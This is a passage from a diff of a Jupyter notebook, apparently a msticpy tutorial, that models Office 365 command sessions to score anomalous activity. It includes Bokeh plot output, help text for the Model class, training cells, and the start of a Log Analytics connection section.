\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-User\",\"Set-User\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"New-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"],[\"Set-ConditionalAccessPolicy\",\"Set-ConditionalAccessPolicy\"]],\"rarest_window3_likelihood\":{\"__ndarray__\":\"Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj/mk1whRthQP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/k2B0C8QqTT9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP4ATX5xAOPY+x6Zf1LvJsz/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/x6Zf1LvJsz8HG9tEBpltPwcb20QGmW0/wXgr+xxSMz/hF2+OujY0P8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP5NgdAvEKk0/x6Zf1LvJsz9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP+aTXCFG2FA/x6Zf1LvJsz9nym6baQuoP8emX9S7ybM/Z8pum2kLqD/Hpl/Uu8mzP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP8emX9S7ybM/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/BxvbRAaZbT9nym6baQuoP2fKbptpC6g/iY+KUFZE/T5nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD/+10yLIUEWP/7XTIshQRY/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP2fKbptpC6g/Z8pum2kLqD8HG9tEBpltP7kzgspBKhU/Z8pum2kLqD9nym6baQuoPzPMHyOt0Ts/M8wfI63ROz8zzB8jrdE7PwKauiszdhA/BlI6ubqfPj9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/Z8pum2kLqD+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP2fKbptpC6g/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/uVNJlgpXpj+5U0mWClemP7lTSZYKV6Y/Z8pum2kLqD+5U0mWClemP2fKbptpC6g/5pNcIUbYUD9nym6baQuoP7lTSZYKV6Y/x6Zf1LvJsz/nmqaw4HdEP8emX9S7ybM/Z8pum2kLqD9nym6baQuoP2fKbptpC6g/x6Zf1LvJsz/Hpl/Uu8mzP2fKbptpC6g/Z8pum2kLqD8=\",\"dtype\":\"float64\",\"shape\":[154]},\"time_col\":[\"2020-05-12 01:34:59+00:00\",\"2020-05-12 04:48:43+00:00\",\"2020-05-20 02:18:27+00:00\",\"2020-05-20 05:12:55+00:00\",\"2020-05-21 01:50:12+00:00\",\"2020-05-21 04:32:03+00:00\",\"2020-05-22 02:13:21+00:00\",\"2020-05-22 04:54:58+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-19 16:46:51+00:00\",\"2020-05-19 22:48:50+00:00\",\"2020-05-20 04:50:35+00:00\",\"2020-05-20 10:52:47+00:00\",\"2020-05-20 16:54:39+00:00\",\"2020-05-20 22:56:57+00:00\",\"2020-05-21 04:58:21+00:00\",\"2020-05-21 10:59:57+00:00\",\"2020-05-21 13:00:51+00:00\",\"2020-05-21 19:02:18+00:00\",\"2020-05-21 22:52:47+00:00\",\"2020-05-22 04:54:26+00:00\",\"2020-05-22 10:58:25+00:00\",\"2020-03-24 14:56:52+00:00\",\"2020-03-24 15:05:18+00:00\",\"2020-03-24 15:08:48+00:00\",\"2020-03-24 15:22:13+00:00\",\"2020-03-24 15:54:15+00:00\",\"2020-03-24 16:44:25+00:00\",\"2020-03-24 17:00:41+00:00\",\"2020-03-26 18:06:26+00:00\",\"2020-03-26 18:41:40+00:00\",\"2020-03-26 18:44:40+00:00\",\"2020-03-26 18:53:51+00:00\",\"2020-03-26 19:11:11+00:00\",\"2020-03-26 19:18:22+00:00\",\"2020-03-26 19:25:24+00:00\",\"2020-03-26 19:33:04+00:00\",\"2020-03-26 19:42:54+00:00\",\"2020-03-26 22:40:30+00:00\",\"2020-03-27 14:34:51+00:00\",\"2020-03-27 14:59:24+00:00\",\"2020-03-27 15:12:37+00:00\",\"2020-03-27 15:15:11+00:00\",\"2020-03-27 15:21:28+00:00\",\"2020-03-27 15:37:57+00:00\",\"2020-03-27 16:09:20+00:00\",\"2020-03-31 02:19:26+00:00\",\"2020-04-01 20:12:19+00:00\",\"2020-04-02 09:01:22+00:00\",\"2020-04-02 14:02:50+00:00\",\"2020-04-02 14:05:54+00:00\",\"2020-04-04 10:43:38+00:00\",\"2020-04-05 21:17:39+00:00\",\"2020-04-06 08:25:34+00:00\",\"2020-04-06 08:40:49+00:00\",\"2020-04-06 08:45:08+00:00\",\"2020-04-06 18:28:22+00:00\",\"2020-04-07 19:29:10+00:00\",\"2020-04-07 21:50:17+00:00\",\"2020-04-08 16:29:58+00:00\",\"2020-04-08 16:38:23+00:00\",\"2020-04-08 16:45:26+00:00\",\"2020-04-08 16:59:37+00:00\",\"2020-04-08 17:03:19+00:00\",\"2020-04-08 17:31:38+00:00\",\"2020-04-08 17:35:18+00:00\",\"2020-04-09 16:56:54+00:00\",\"2020-04-09 17:01:23+00:00\",\"2020-04-09 17:17:28+00:00\",\"2020-04-09 17:21:53+00:00\",\"2020-04-09 17:26:16+00:00\",\"2020-04-09 17:38:32+00:00\",\"2020-04-09 17:52:48+00:00\",\"2020-04-09 18:09:58+00:00\",\"2020-04-15 03:13:51+00:00\",\"2020-04-15 06:14:35+00:00\",\"2020-04-16 02:49:02+00:00\",\"2020-04-16 06:06:35+00:00\",\"2020-04-16 22:46:54+00:00\",\"2020-04-17 03:29:24+00:00\",\"2020-04-17 06:13:17+00:00\",\"2020-04-17 21:00:31+00:00\",\"2020-04-18 01:38:36+00:00\",\"2020-04-18 04:50:30+00:00\",\"2020-04-19 02:55:49+00:00\",\"2020-04-20 03:02:34+00:00\",\"2020-04-20 06:04:29+00:00\",\"2020-04-22 03:12:39+00:00\",\"2020-04-23 06:07:23+00:00\",\"2020-04-23 21:42:48+00:00\",\"2020-04-24 03:12:12+00:00\",\"2020-04-24 06:00:47+00:00\",\"2020-04-25 06:18:01+00:00\",\"2020-04-26 02:42:04+00:00\",\"2020-04-26 06:09:29+00:00\",\"2020-04-27 03:17:16+00:00\",\"2020-04-28 06:08:58+00:00\",\"2020-04-29 15:01:44+00:00\",\"2020-04-30 02:48:54+00:00\",\"2020-04-30 06:02:13+00:00\",\"2020-04-30 22:09:32+00:00\",\"2020-05-01 03:11:34+00:00\",\"2020-05-01 05:59:09+00:00\",\"2020-05-01 10:55:14+00:00\",\"2020-05-02 11:31:53+00:00\",\"2020-05-05 02:56:24+00:00\",\"2020-05-05 06:21:38+00:00\",\"2020-05-05 16:47:31+00:00\",\"2020-05-05 16:55:05+00:00\",\"2020-05-05 17:23:30+00:00\",\"2020-05-06 01:49:17+00:00\",\"2020-05-06 02:51:10+00:00\",\"2020-05-08 03:12:52+00:00\",\"2020-05-08 05:52:11+00:00\",\"2020-05-09 02:58:45+00:00\",\"2020-05-11 01:58:14+00:00\",\"2020-05-11 04:57:16+00:00\",\"2020-05-14 02:07:32+00:00\",\"2020-05-14 05:04:33+00:00\",\"2020-05-15 03:09:56+00:00\",\"2020-05-16 06:05:56+00:00\",\"2020-05-16 06:48:04+00:00\",\"2020-05-16 09:20:17+00:00\",\"2020-05-16 15:22:05+00:00\",\"2020-05-16 21:23:49+00:00\",\"2020-05-17 03:04:51+00:00\",\"2020-05-17 03:14:05+00:00\",\"2020-05-17 03:54:47+00:00\",\"2020-05-17 09:56:20+00:00\",\"2020-05-17 15:57:55+00:00\",\"2020-05-17 21:59:40+00:00\",\"2020-05-18 04:01:35+00:00\",\"2020-05-18 09:02:19+00:00\",\"2020-05-18 10:03:01+00:00\",\"2020-05-18 12:12:55+00:00\",\"2020-05-18 15:02:53+00:00\",\"2020-05-18 18:15:15+00:00\",\"2020-05-18 22:41:41+00:00\",\"2020-05-19 01:58:06+00:00\",\"2020-05-19 04:43:13+00:00\",\"2020-05-19 05:13:27+00:00\",\"2020-05-19 09:54:28+00:00\",\"2020-05-19 10:02:31+00:00\",\"2020-05-19 10:45:23+00:00\",\"2020-05-19 11:14:31+00:00\",\"2020-05-19 13:29:55+00:00\",\"2020-05-19 13:44:48+00:00\",\"2020-05-19 13:48:08+00:00\",\"2020-05-19 13:55:42+00:00\",\"2020-05-19 13:58:13+00:00\",\"2020-05-19 14:01:02+00:00\",\"2020-05-19 14:06:06+00:00\",\"2020-05-19 14:27:14+00:00\",\"2020-05-19 14:30:31+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"1432\"},\"selection_policy\":{\"id\":\"1433\"}},\"id\":\"1387\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"axis\":{\"id\":\"1379\"},\"ticker\":null},\"id\":\"1382\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"1425\",\"type\":\"DaysTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1394\"},\"x_range\":{\"id\":\"1331\"},\"y_range\":null},\"id\":\"1393\",\"type\":\"RangeTool\"},{\"attributes\":{},\"id\":\"1431\",\"type\":\"YearsTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"1369\",\"type\":\"Title\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1429\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1590907598950.0002,\"start\":1584299318049.9998},\"id\":\"1371\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"1387\"}},\"id\":\"1392\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1373\",\"type\":\"DataRange1d\"},{\"attributes\":{\"source\":{\"id\":\"1362\"}},\"id\":\"1367\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1403\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1385\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"1360\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"text\":\"Timeline\"},\"id\":\"1329\",\"type\":\"Title\"},{\"attributes\":{},\"id\":\"1416\",\"type\":\"YearsTicker\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"render_mode\":\"css\",\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"1352\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"rarest_window3_likelihood\"}},\"id\":\"1365\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"1394\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"value\":\"navy\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"rarest_window3_likelihood\"}},\"id\":\"1364\",\"type\":\"Circle\"},{\"attributes\":{},\"id\":\"1432\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1377\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1433\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1375\",\"type\":\"LinearScale\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"blue\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"blue\"},\"x\":{\"field\":\"TimeGenerated_min\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1390\",\"type\":\"Circle\"}],\"root_ids\":[\"1398\"]},\"title\":\"Bokeh Application\",\"version\":\"2.0.2\"}};\n",
+       "  var render_items = [{\"docid\":\"518aa18f-5e93-4c9e-b6fb-b6f5a23d63c2\",\"root_ids\":[\"1398\"],\"roots\":{\"1398\":\"b74e12c1-f5a6-4178-ad3f-94e42e4c5999\"}}];\n",
+       "  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n",
+       "\n",
+       "  }\n",
+       "  if (root.Bokeh !== undefined) {\n",
+       "    embed_document(root);\n",
+       "  } else {\n",
+       "    var attempts = 0;\n",
+       "    var timer = setInterval(function(root) {\n",
+       "      if (root.Bokeh !== undefined) {\n",
+       "        clearInterval(timer);\n",
+       "        embed_document(root);\n",
+       "      } else {\n",
+       "        attempts++;\n",
+       "        if (attempts > 100) {\n",
+       "          clearInterval(timer);\n",
+       "          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n",
+       "        }\n",
+       "      }\n",
+       "    }, 10, root)\n",
+       "  }\n",
+       "})(window);"
+      ],
+      "application/vnd.bokehjs_exec.v0+json": ""
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "1398"
+      }
+     },
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "# let's model and visualise these sessions in one go\n",
+    "\n",
+    "anomalous.score_and_visualise_sessions(\n",
+    "    data=sessions_df,\n",
+    "    session_column='Operation_list',\n",
+    "    window_length=3,\n",
+    "    time_column='TimeGenerated_min',\n",
+    "    source_columns=['UserId', 'ClientIP']\n",
+    ")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Advanced Users: Access the Model Class Directly <a id='model_class'></a>\n",
+    "\n",
+    "Users who would like to configure arguments related to whether start and end tokens are used or whether the geometric mean is computed, can access the Model class directly. \n",
+    "\n",
+    "There is also the option to specify the modellable_params argument if you do not wish for rough heuristics to be used to determine which parameters take categorical values and are hence suitable for modelling. If you wish to experiment with modelling the values of all the parameters (categorical + arbitrary strings), then you can use this argument to do so.\n",
+    "\n",
+    "<b>Here are some details about the methods available for the Model class:</b>\n",
+    "\n",
+    "```\n",
+    "Help on class Model in module msticpy.analysis.anomalous_sequence.model:\n",
+    "\n",
+    "class Model(builtins.object)\n",
+    " |  Model(sessions: List[List[Union[str, msticpy.analysis.anomalous_sequence.utils.data_structures.Cmd]]], modellable_params: set = None)\n",
+    " |  \n",
+    " |  Class for modelling sessions data.\n",
+    " |  \n",
+    " |  Methods defined here:\n",
+    " |  \n",
+    " |  __init__(self, sessions: List[List[Union[str, msticpy.analysis.anomalous_sequence.utils.data_structures.Cmd]]], modellable_params: set = None)\n",
+    " |      Instantiate the Model class.\n",
+    " |      \n",
+    " |      This Model class can be used to model sessions, where each\n",
+    " |      session is a sequence of commands. We use a sliding window\n",
+    " |      approach to calculate the rarest part of each session. We\n",
+    " |      can view the sessions in ascending order of this metric to\n",
+    " |      see if the top sessions are anomalous/malicious.\n",
+    " |      \n",
+    " |      Parameters\n",
+    " |      ----------\n",
+    " |      sessions: List[List[Union[str, Cmd]]]\n",
+    " |          list of sessions, where each session is a list of either\n",
+    " |          strings or a list of the Cmd datatype.\n",
+    " |      \n",
+    " |          The Cmd datatype should have \"name\" and \"params\" as attributes\n",
+    " |          where \"name\" is the name of the command (string) and \"params\"\n",
+    " |          is either a set of accompanying params or a dict of\n",
+    " |          accompanying params and values.\n",
+    " |      \n",
+    " |          examples formats of a session:\n",
+    " |              1) ['Set-User', 'Set-Mailbox']\n",
+    " |              2) [Cmd(name='Set-User', params={'Identity', 'Force'}),\n",
+    " |                  Cmd(name='Set-Mailbox', params={'Identity', 'AuditEnabled'})]\n",
+    " |              3) [Cmd(\n",
+    " |                      name='Set-User',\n",
+    " |                      params={'Identity': 'blahblah', 'Force': 'true'}\n",
+    " |                  ),\n",
+    " |                  Cmd(name='Set-Mailbox',\n",
+    " |                  params={'Identity': 'blahblah', 'AuditEnabled': 'false'})]\n",
+    " |      modellable_params: set, optional\n",
+    " |          set of params which you deem to have categorical values which are suitable\n",
+    " |          for modelling.\n",
+    " |          Note this argument will only have an effect if your sessions include commands,\n",
+    " |          params and values. If your sessions include commands, params and values and\n",
+    " |          this argument is not set, then some rough heuristics will be used to determine\n",
+    " |          which params have values which are suitable for modelling.\n",
+    " |  \n",
+    " |  compute_geomean_lik_of_sessions(self)\n",
+    " |      Compute the geometric mean of the likelihood for each of the sessions.\n",
+    " |      \n",
+    " |      This is done by raising the likelihood of the session to the power of\n",
+    " |      (1 / k) where k is the length of the session.\n",
+    " |      \n",
+    " |      Note: If the lengths (number of commands) of the sessions vary a lot,\n",
+    " |      then you may not be able to fairly compare the likelihoods between a\n",
+    " |      long session and a short session. This is because longer sessions\n",
+    " |      involve multiplying more numbers together which are between 0 and 1.\n",
+    " |      Therefore the length of the session will be negatively correlated with\n",
+    " |      the likelihoods. If you take the geometric mean of the likelihood, then\n",
+    " |      you can compare the likelihoods more fairly across different session\n",
+    " |      lengths.\n",
+    " |  \n",
+    " |  compute_likelihoods_of_sessions(self, use_start_end_tokens: bool = True)\n",
+    " |      Compute the likelihoods for each of the sessions.\n",
+    " |      \n",
+    " |      Note: If the lengths (number of commands) of the sessions vary a lot,\n",
+    " |      then you may not be able to fairly compare the likelihoods between a\n",
+    " |      long session and a short session. This is because longer sessions\n",
+    " |      involve multiplying more numbers together which are between 0 and 1.\n",
+    " |      Therefore the length of the session will be negatively correlated with\n",
+    " |      the likelihoods. If you take the geometric mean of the likelihood, then\n",
+    " |      you can compare the likelihoods more fairly across different session\n",
+    " |      lengths\n",
+    " |      \n",
+    " |      Parameters\n",
+    " |      ----------\n",
+    " |      use_start_end_tokens: bool\n",
+    " |          if True, then `start_token` and `end_token` will be prepended\n",
+    " |          and appended to the session respectively before the calculations\n",
+    " |          are done\n",
+    " |  \n",
+    " |  compute_rarest_windows(self, window_len: int, use_start_end_tokens: bool = True, use_geo_mean: bool = False)\n",
+    " |      Find the rarest window and corresponding likelihood for each session.\n",
+    " |      \n",
+    " |      In particular, uses a sliding window approach to find the rarest window\n",
+    " |      and corresponding likelihood for that window for each session.\n",
+    " |      \n",
+    " |      If we have a long session filled with benign activity except for a small\n",
+    " |      window of suspicious behaviour, then this approach should be able to\n",
+    " |      identity the session as anomalous. This approach should be more\n",
+    " |      effective than simply taking the geometric mean of the full session\n",
+    " |      likelihood. This is because the small window of suspicious behaviour\n",
+    " |      might get averaged out by the majority benign behaviour in the session\n",
+    " |      when using the geometric mean approach.\n",
+    " |      \n",
+    " |      Note that if we have a session of length k, and we use a sliding window\n",
+    " |      of length k+1, then we will end up with np.nan for the rarest window\n",
+    " |      likelihood metric for that session. However, if `use_start_end_tokens`\n",
+    " |      is set to True, then because we will be appending self.end_token to the\n",
+    " |      session, the session will be treated as a session of length k+1,\n",
+    " |      therefore, we will end up with a non np.nan value.\n",
+    " |      \n",
+    " |      Parameters\n",
+    " |      ----------\n",
+    " |      window_len: int\n",
+    " |          length of sliding window for likelihood calculations\n",
+    " |      use_start_end_tokens: bool\n",
+    " |          if True, then `start_token` and `end_token` will be prepended\n",
+    " |          and appended to each\n",
+    " |          session respectively before the calculations are done\n",
+    " |      use_geo_mean: bool\n",
+    " |          if True, then each of the likelihoods of the sliding windows\n",
+    " |          will be raised to the power\n",
+    " |          of (1/`window_len`)\n",
+    " |  \n",
+    " |  compute_scores(self, use_start_end_tokens: bool)\n",
+    " |      Compute some likelihood based scores/metrics for each of the sessions.\n",
+    " |      \n",
+    " |      In particular, computes the likelihoods and geometric mean of\n",
+    " |      the likelihoods for each of the sessions. Also, uses the sliding\n",
+    " |      window approach to compute the rarest window likelihoods for each\n",
+    " |      of the sessions. It does this for windows of length 2 and 3.\n",
+    " |      \n",
+    " |      Note that if we have a session of length k, and we use a sliding\n",
+    " |      window of length k+1, then we will end up with np.nan for the\n",
+    " |      rarest window likelihood metric for that session.\n",
+    " |      However, if `use_start_end_tokens` is set to True, then\n",
+    " |      because we will be appending self.end_token to the session,\n",
+    " |      the session will be treated as a session of length k+1,\n",
+    " |      therefore, we will end up with a non np.nan value for that session.\n",
+    " |      \n",
+    " |      Parameters\n",
+    " |      ----------\n",
+    " |      use_start_end_tokens: bool\n",
+    " |          if True, then self.start_token and self.end_token will be\n",
+    " |          prepended and appended to each\n",
+    " |          of the sessions respectively before the calculations are done.\n",
+    " |  \n",
+    " |  compute_setof_params_cond_cmd(self, use_geo_mean: bool)\n",
+    " |      Compute likelihood of combinations of params conditional on the cmd.\n",
+    " |      \n",
+    " |      In particular, go through each command from each session and\n",
+    " |      compute the probability of that set of params (and values if provided)\n",
+    " |      appearing conditional on the command.\n",
+    " |      \n",
+    " |      This can help us to identify unlikely combinations of params\n",
+    " |      (and values if provided) for each distinct command.\n",
+    " |      \n",
+    " |      Note, this method is only available if each session is a list\n",
+    " |       of the Cmd datatype. It will result in an Exception if you\n",
+    " |       try and use it when each session is a list of strings.\n",
+    " |      \n",
+    " |      Parameters\n",
+    " |      ----------\n",
+    " |      use_geo_mean: bool\n",
+    " |          if True, then the probabilities will be raised to\n",
+    " |          the power of (1/K)\n",
+    " |          case1: we have only params:\n",
+    " |              Then K is the number of distinct params which appeared\n",
+    " |              for the given cmd across all the sessions.\n",
+    " |          case2: we have params and values:\n",
+    " |              Then K is the number of distinct params which appeared\n",
+    " |              for the given cmd across all the sessions + the number\n",
+    " |              of values which we included in the modelling for this cmd.\n",
+    " |  \n",
+    " |  train(self)\n",
+    " |      Train the model by computing counts and probabilities.\n",
+    " |      \n",
+    " |      In particular, computes the counts and probabilities of the commands\n",
+    " |      (and possibly the params if provided, and possibly the values if provided)\n",
+    " |\n",
+    "```\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 15,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "model = Model(sessions=sessions_df.Operation_list.values.tolist())"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 16,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "model.train()"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 17,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "model.compute_rarest_windows(window_len=2)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 18,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/plain": [
+       "[0.06277653078978894,\n",
+       " 0.06277653078978894,\n",
+       " 0.06277653078978894,\n",
+       " 0.06277653078978894,\n",
+       " 0.06277653078978894]"
+      ]
+     },
+     "execution_count": 18,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "model.rare_window_likelihoods[2][:5]"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Sessionize Some Other Types of Logs using KQL <a id='other_sessions'></a>\n",
+    "\n",
+    "The aim of this section is to provide some starter guidance on how one might start to sessionize + model some other types of logs. \n",
+    "\n",
+    "In order to do the sessionizing using KQL, we use the [row_window_session](https://docs.microsoft.com/azure/data-explorer/kusto/query/row-window-session-function) function.\n",
+    "\n",
+    "\n",
+    "\n",
+    "<b>Important note</b>: Throughout this section, the decisions made about which columns should be interpreted as commands/events and parameters are entirely subjective and alternative approaches may also be valid."
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "\n",
+    "## Using LogAnalytics Query Provider <a id='la_auth'></a>\n",
+    "\n",
+    "msticpy has a QueryProvider class which you can use to connect to your Log Analytics data environment."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 23,
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "                            <html><body><script>\n",
+       "\n",
+       "                                // close authentication window\n",
+       "                                if (kql_MagicUserCodeAuthWindow && kql_MagicUserCodeAuthWindow.opener != null && !kql_MagicUserCodeAuthWindow.closed) {\n",
+       "                                    kql_MagicUserCodeAuthWindow.close()\n",
+       "                                }\n",
+       "                                // TODO: make sure, you clear the right cell. BTW, not sure it is a must to do any clearing\n",
+       "\n",
+       "                                // clear output cell\n",
+       "                                Jupyter.notebook.clear_output(Jupyter.notebook.get_selected_index())\n",
+       "\n",
+       "                                // TODO: if in run all mode, move to last cell, otherwise move to next cell\n",
+       "                                // move to next cell\n",
+       "\n",
+       "                            </script></body></html>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<!DOCTYPE html>\n",
+       "            <html><body>\n",
+       "            <div style=''>\n",
+       "            \n",
+       "            <button onclick=\"this.style.visibility='visible';\n",
+       "            kql_MagicLaunchWindowFunction('kqlmagic/temp_files/308433b4-eaa8-426e-ab44-7f9172994473/_ab86c959-1ba3-495c-a00d-ced30d8825d3_at_loganalytics_schema.html', 'fullscreen=no,directories=no,location=no,menubar=no,resizable=yes,scrollbars=yes,status=no,titlebar=no,toolbar=no,', '_ab86c959_1ba3_495c_a00d_ced30d8825d3_at_loganalytics_schema', '');\n",
+       "            kql_MagicCloseWindow(kql_Magic__ab86c959_1ba3_495c_a00d_ced30d8825d3_at_loganalytics_schema, -1, -1);\">\n",
+       "            popup schema ab86c959-1ba3-495c-a00d-ced30d8825d3@loganalytics</button>\n",
+       "            </div>\n",
+       "\n",
+       "            <script>\n",
+       "            var kql_Magic__ab86c959_1ba3_495c_a00d_ced30d8825d3_at_loganalytics_schema = null;\n",
+       "\n",
+       "\n",
+       "            function kql_MagicCloseWindow(window_obj, obj_secs, itself_secs) {\n",
+       "                if (obj_secs >= 0) {\n",
+       "                    _timeout = setTimeout(function(){\n",
